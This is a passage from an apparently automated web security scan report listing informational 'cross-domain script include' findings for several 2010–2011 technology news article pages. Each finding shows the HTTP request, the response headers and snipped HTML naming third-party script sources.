<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.316. http://technolog.msnbc.redacted/_news/2010/08/30/5001506-nintendo-drops-dsi-and-dsi-xl-prices-20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/30/5001506-nintendo-drops-dsi-and-dsi-xl-prices-20

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/30/5001506-nintendo-drops-dsi-and-dsi-xl-prices-20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=241
Date: Sun, 30 Jan 2011 02:20:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53812

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Nintendo drop
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/3184fbf3a1cea536a06ab9ecdadcc3b45c540e59.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d96c8b3032770da5152df3c93298ef8d7e4320a.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.317. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=240
Date: Sun, 30 Jan 2011 02:20:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57147

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - ThinkPad make
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.318. http://technolog.msnbc.redacted/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=259
Date: Sun, 30 Jan 2011 02:19:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201012

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Apple calls t
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/2bec8693ba2bbf1b5e59fba85e1eaa8e41e25f54.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.319. http://technolog.msnbc.redacted/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=227
Date: Sun, 30 Jan 2011 02:20:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93375

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Woman tries t
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.320. http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=247
Date: Sun, 30 Jan 2011 02:20:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123579

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Online degree
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/2bec8693ba2bbf1b5e59fba85e1eaa8e41e25f54.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.321. http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=29
Date: Sun, 30 Jan 2011 02:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177598

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - What the Egyp
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/2bec8693ba2bbf1b5e59fba85e1eaa8e41e25f54.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
